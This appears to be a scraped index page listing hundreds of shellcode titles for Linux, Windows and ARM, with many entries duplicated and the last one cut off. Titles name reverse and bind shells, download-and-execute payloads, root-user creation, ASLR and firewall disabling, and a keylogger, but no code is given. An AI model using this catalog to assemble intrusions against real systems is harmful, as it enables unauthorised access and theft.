XOR 88 Encoded Polymorphic Shellcode (78 bytes) Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) XOR 88 Encoded Polymorphic Shellcode (78 bytes) Linux/x86 - Bind TCP /bin/sh Shell (64533/TCP) Shellcode (97 bytes) ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) Linux/ARM - execve(_/bin/sh__ [_/bin/sh_]_ NULL) Polymorphic Shellcode (Generator) Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes) Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Windows x86 - Write-to-file ('pwned' ./f.txt) Null-Free Shellcode (278 bytes) Linux/x86-64 - execve(_/sbin/iptables__ [_/sbin/iptables__ _-F_]_ NULL) Shellcode (49 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (8080/TCP) Shellcode (75 bytes) Linux/x86 - execve /bin/sh Polymorphic Null-Free Shellcode (46 bytes) Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes) Windows XP SP3 x86 (Turkish) - Add Administrator User (zrl/123456) Shellcode (127 bytes) Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Windows XP Professional SP3 x86 (English) - Add Local Administrator User (secuid0/m0nk) Shellcode (113 bytes) Windows x86 - Add Local Administrator User (secuid0/m0nk) Shellcode (326 bytes) Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Linux/ARM - Bind UDP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode Windows 5.0 < 7.0 x86 - Speaking 'You got pwned!' Null-Free Shellcode Windows x86 - Eggsearch Shellcode (33 bytes) Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) Windows x86 - Eggsearch Shellcode (33 bytes) Linux/SuperH (sh4) - setuid(0) + chmod 0666 /etc/shadow + exit(0) Shellcode (43 bytes) Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes) Linux/x86 - Disable ASLR Security Shellcode (83 bytes) Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) Linux/x86 - Reverse TCP SSL Shell (localhost:8080/TCP) Shellcode (422 bytes) Linux/SuperH (sh4) - Add Root User (shell-storm/toor) Shellcode (143 bytes) Windows PerfectXp-pc1/SP3 x86 (Turkish) - Add Administrator User (kpss/12345) Shellcode (112 bytes) Linux/x86 - Egghunter Null-Free Shellcode (29 bytes) Linux/SuperH (sh4) - setuid(0); + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) Linux/SuperH (sh4) - setuid(0) + execve(_/bin/sh__ NULL_ NULL) Shellcode (27 bytes) Linux/x86-64 - execve /bin/sh Shellcode (52 bytes) Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) Linux/x86 - execve /bin/dash Shellcode (42 bytes) Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) Linux/x86 - setuid(0) + setgid(0) + Add Root User (iph) To /etc/passwd Polymorphic Shellcode Linux/x86 - Search For '.PHP'/'.HTML' Writable Files + Add Code Shellcode (380+ bytes) Linux/x86-64 - Add Root User (t0r/Winner) Shellcode (189 bytes) Linux/x86 - execve /bin/dash Shellcode (42 bytes) Linux/x86 - chmod 666 /etc/passwd + /etc/shadow Shellcode (57 bytes) Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes) Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes) Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) Windows x64 - Bind TCP Shell (4444/TCP) Shellcode (508 bytes) Linux/x86 - Remote Port Forwarding (ssh -R 9999:localhost:22 192.168.0.226) Shellcode (87 bytes) Linux/x86 - Reverse TCP Shell (192.168.1.10:31337/TCP) Shellcode (92 bytes) MIPS (Little Endian) - system() Shellcode (80 bytes) Linux/MIPS (Little Endian) - system() Shellcode (80 bytes) Linux/x86 - Egghunter Shellcode (31 bytes) Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Linux/x86 - Egghunter Shellcode (31 bytes) Linux/x86 - Egg Omelet (Multi-Egghunter) + Reverse TCP /bin/sh Shell (192.168.122.1:43981/TCP) Shellcode Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes) Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes) Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Shellcode (77 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL); Position Independent Alphanumeric Shellcode (87 bytes) Linux/x86 - rmdir Shellcode (37 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + Execute /bin/sh Shellcode (378 bytes) Linux/x86 - chmod 777 (/etc/passwd + /etc/shadow) + Add Root User (ALI/ALI) + setreuid + Execute /bin/bash Obfuscated Shellcode (521 bytes) Linux/x86-64 - Reverse TCP /bin/bash Shell (127.1.1.1:6969/TCP) Shellcode (139 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Shellcode (77 bytes) Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL) Position Independent Alphanumeric Shellcode (87 bytes) Linux/x86 - rmdir Shellcode (37 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) + Password (Z~r0) Null-Free Shellcode (81/96 bytes) Linux/x86-64 - Reverse TCP Password (Z~r0) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free + Null-Mask Shellcode (77-85/90-98 bytes) Windows x86 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Windows x64 - Add Administrator User (ALI/ALI) + Add To RDP Group + Enable RDP From Registry + STOP Firewall + Auto Start Terminal Service Obfuscated Shellcode (1218 bytes) Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes) Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) Linux/x86 - Add Map (google.com 127.1.1.1) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes) Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes) Linux/x86 - Disable ASLR Security Shellcode (84 bytes) Linux/x86 - Egghunter Shellcode (20 bytes) Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes) Linux/x86 - execve /bin/sh ROT13 Encoded Shellcode (68 bytes) Linux/x86 - chmod 0777 /etc/shadow Obfuscated Shellcode (84 bytes) Linux/x86 - Add Map (127.1.1.1 google.com) In /etc/hosts Obfuscated Shellcode (98 bytes) Linux/x86 - execve /bin/sh Obfuscated Shellcode (40 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.1.133:33333/TCP) Shellcode (72 bytes) Linux/x86 - Bind TCP /bin/sh Shell (33333/TCP) Shellcode (96 bytes) Linux/x86 - Disable ASLR Security Shellcode (84 bytes) Linux/x86 - Egghunter Shellcode (20 bytes) Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes) Linux/x86 - execve /bin/sh Shellcode (35 bytes) Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) Windows XP SP3 x86 - Restart Shellcode (57 bytes) Linux/x86 - Create _my.txt_ In Working Directory Shellcode (37 bytes) Linux/x86 - setreuid(0_ 0) + execve(_/sbin/halt_) + exit(0) Shellcode (49 bytes) Linux/x86 - execve /bin/sh Shellcode (35 bytes) Windows XP SP3 x86 - Create (_file.txt_) Shellcode (83 bytes) Windows XP SP3 x86 - Restart Shellcode (57 bytes) Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes) Linux/x86 - exit(0) Shellcode (6 bytes) Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - Shutdown(init 0) Shellcode (30 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 bytes) Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes) Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) Linux/x86 - Download File + Execute Shellcode Linux/x86 - Reboot Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (23 bytes) Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) Linux/x86 - exec /bin/dash Shellcode (45 bytes) Linux/x86-64 - execve Encoded Shellcode (57 bytes) Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) Linux/x86 - Egghunter Shellcode (19 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode Windows 2003 x64 - Token Stealing Shellcode (59 bytes) Linux/x86 - execve /bin/sh (Push Method) Shellcode (21 bytes) Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (17771/TCP) Shellcode (58 bytes) Linux/x86 - exit(0) Shellcode (6 bytes) Linux/x86 - execve /bin/sh Shellcode (26 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) (1) Linux/x86 - chmod 777 /etc/shadow + exit() Shellcode (33 bytes) Linux/x86 - Shutdown(init 0) Shellcode (30 bytes) Linux/x86 - Read /etc/passwd Shellcode (58 bytes) Linux/x86 - mkdir HACK + chmod 777 + exit(0) Shellcode (29 bytes) Linux/x86 - Bind Netcat Shell (5555/TCP) Shellcode (60 bytes) Linux/x86-64 - execve /bin/sh Null-Free Shellcode (30 bytes) Linux/x86 - Download File + Execute Shellcode Linux/x86 - Reboot Shellcode (28 bytes) Linux/x86 - execve /bin/sh Shellcode (23 bytes) Linux/x86 - chmod 0777 /etc/passwd Shellcode (42 bytes) Linux/x86 - chmod /etc/gshadow Shellcode (37 bytes) Linux/x86 - chmod 0777 /etc/shadow Shellcode (42 bytes) Linux/x86 - exec /bin/dash Shellcode (45 bytes) Linux/x86-64 - execve Encoded Shellcode (57 bytes) Linux/x86 - execve /bin/sh ROT7 Encoded Shellcode Windows XP SP3 x86 (Turkish) - MessageBox Shellcode (24 bytes) Linux/x86 - Egghunter Shellcode (19 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null-Free Shellcode (199 bytes) Linux/x86 - execve /bin/sh ROL/ROR Encoded Shellcode Windows 2003 x64 - Token Stealing Shellcode (59 bytes) Linux/x86 - execve /bin/bash Shellcode (31 bytes) Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes) Linux/x86-64 - execve /bin/sh Shellcode (34 bytes) Linux/x86-64 - execve Shellcode (22 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Egghunter Shellcode (24 bytes) Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) Linux/x86-64 - execve Shellcode (22 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (1234) Shell (31173/TCP) Shellcode (92 bytes) Linux/x86-64 - Egghunter Shellcode (24 bytes) Linux/x86-64 - execve Polymorphic Shellcode (31 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes) Linux/x86-64 - Egghunter Shellcode (18 bytes) Linux/x86 - Egghunter Shellcode (13 bytes) Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (103 bytes) Linux/x86-64 - Bind TCP /bin/sh Password (hack) Shell (4444/TCP) Null-Free Shellcode (162 bytes) Linux/x86 - execve /bin/sh Shellcode (24 bytes) (1) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Null-Free Shellcode (151 bytes) Linux/x86-64 - Egghunter Shellcode (18 bytes) Linux/x86 - Egghunter Shellcode (13 bytes) Linux/x86-64 - execve XOR/NOT/DIV Encoded Shellcode (54 bytes) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes) Linux/x86 - Download File + Execute Shellcode (135 bytes) Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse TCP Password (hack) /bin/sh Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (122 bytes) Linux/x86-64 - Reverse TCP Password (hack) Shell (127.0.0.1:4444/TCP) Polymorphic Shellcode (135 bytes) Linux/x86 - Download File + Execute Shellcode (135 bytes) Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes) Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes) Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes) Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes) Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes) Windows x86 - Download File + Run via WebDAV (//192.168.1.19/c) Null-Free Shellcode (96 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.2:1234/TCP) Shellcode (134 bytes) Linux/x86-64 - execve /bin/sh Shellcode (26 bytes) Linux/x86-64 - execve /bin/sh Shellcode (25 bytes) (1) Linux/x86-64 - execve /bin/bash Shellcode (33 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (81 bytes) Linux/x86-64 - Read /etc/passwd Shellcode (65 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (86 bytes) Windows x86 - URLDownloadToFileA() (http://192.168.86.130/sample.exe) + SetFileAttributesA() (pyld.exe) + WinExec() + ExitProcess() Shellcode (394 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (::ffff:192.168.64.129:1472/TCP) (IPv6) Shellcode (159 bytes) Linux/x86 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (1250 bytes) Windows .Net Framework x86 - Execute Native x86 Shellcode Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Windows .Net Framework x86 - Execute Native x86 Shellcode Linux/x86-64 - Bind TCP /bin/sh Shell (1472/TCP) (IPv6) Shellcode (199 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (192.168.209.131:1472/TCP) (IPv6) Shellcode (203 bytes) Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes) Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes) Linux/x86 - Bind TCP /bin/bash Shell (4444/TCP) Shellcode (656 bytes) Linux/x86-64 - execve XOR Encoded Shellcode (84 bytes) Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes) Windows x86 - system(_systeminfo_) Shellcode (224 bytes) Windows x86 - WinExec(_cmd.exe__0) Shellcode (184 bytes) Linux/x86 - Bind Netcat (/bin/nc) /bin/sh Shell (13337/TCP) Shellcode (56 bytes) Windows x86 - system(_systeminfo_) Shellcode (224 bytes) Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes) Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes) Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes) Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Windows x86 - ShellExecuteA(NULL_NULL__cmd.exe__NULL_NULL_1) Shellcode (250 bytes) Linux/x86 - execve /bin/sh + ASLR Bruteforce Shellcode Linux/x86-64 - Reverse TCP cat /etc/passwd (192.168.86.128:1472/TCP) Shellcode (164 bytes) Linux/x86-64 - Bind Netcat Shell Null-Free Shellcode (64 bytes) Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Shellcode (98 bytes) Linux/x86-64 - Bind Ncat Shell (4442/TCP) / SSL / Multi-Channel (4444-4447/TCP) / Persistant / Fork / IPv4/6 / Password Null-Free Shellcode (176 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444/TCP) Shellcode (75 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4/TCP) / Continuously Probing via Socket / Port-Range (391-399) / Password (la crips) Null-Free Shellcode (172 bytes) Linux/x86 - Reverse Xterm Shell (127.1.1.1:10) Shellcode (68 bytes) Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes) Linux/x86 - execve /bin/sh Shellcode (19 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes) Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes) Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes) Windows x86 - MessageBoxA Shellcode (242 bytes) Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes) Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Linux/x86-64 - mkdir Shellcode (25 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - execve /bin/sh Shellcode (19 bytes) Linux/x86-64 - Reverse TCP Shell (10.1.1.4:46357/TCP) / Subtle Probing / Timer / Burst / Password (la crips) / Multi-Terminal Shellcode (84/122/172 bytes) Windows 7 x86 - localhost Port Scanner Shellcode (556 bytes) Linux/x86 - Bind Netcat Shell (98/TCP + UDP) Shellcode (44/52 bytes) Linux/x86 - Bind TCP /bin/zsh Shell (9090/TCP) Shellcode (96 bytes) Linux/x86 - Reverse TCP /bin/zsh Shell (127.255.255.254:9090/TCP) Shellcode (80 bytes) Windows x86 - MessageBoxA Shellcode (242 bytes) Windows x86 - CreateProcessA cmd.exe Shellcode (253 bytes) Windows x86 - InitiateSystemShutdownA() Shellcode (599 bytes) Windows x64 - cmd.exe WinExec() Shellcode (93 bytes) Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes) Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes) Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes) Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes) Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes) Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes) Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes) Windows x64 - CreateRemoteThread() DLL Injection Shellcode (584 bytes) Linux/x86-64 - mkdir Shellcode (25 bytes) Linux/x86-64 - Bind TCP Shell (5600/TCP) Shellcode (87 bytes) Linux/x86-64 - execve /bin/sh Shellcode (22 bytes) Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes) Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Linux/x86-64 - Egghunter Shellcode (38 bytes) Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Windows x86 - Hide Console Window Shellcode (182 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes) Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes) Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes) Linux/x86-64 - Egghunter Shellcode (38 bytes) Windows x86 - Executable Directory Search Null-Free Shellcode (130 bytes) Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes) Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes) Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes) Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes) Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes) Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes) Windows x86 - Hide Console Window Shellcode (182 bytes) Linux/x86 - Reverse TCP /bin/sh Shell (127.1.1.1:8888/TCP) Null-Free Shellcode (67/69 bytes) Linux/x86 - execve /bin/dash Shellcode (30 bytes) Linux/x86 - execve(/bin/sh) Polymorphic Shellcode (53 bytes) Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes) Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes) Linux/x86 - Read /etc/passwd Shellcode (54 bytes) Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes) Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes) Linux/x86-64 - execve /bin/sh Shellcode (21 bytes) Linux/x86 - execve /bin/sh Shellcode (21 bytes) Windows 10 x64 - Egghunter Shellcode (45 bytes) Linux/x86-64 - execve /bin/sh Shellcode (31 bytes) (2) Linux/x86 - Egghunter Shellcode (18 bytes) Linux/x86 - Disable ASLR Security Shellcode (80 bytes) Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes) Linux/ARM - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (79 bytes) Linux/ARM - chmod(_/etc/passwd__ 0777) Shellcode (39 bytes) Linux/ARM - creat(_/root/pwned__ 0777) Shellcode (39 bytes) Linux/ARM - execve(_/bin/sh__ []_ [0 vars]) Shellcode (35 bytes) Linux/ARM - execve(_/bin/sh__NULL_0) Shellcode (31 bytes) Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 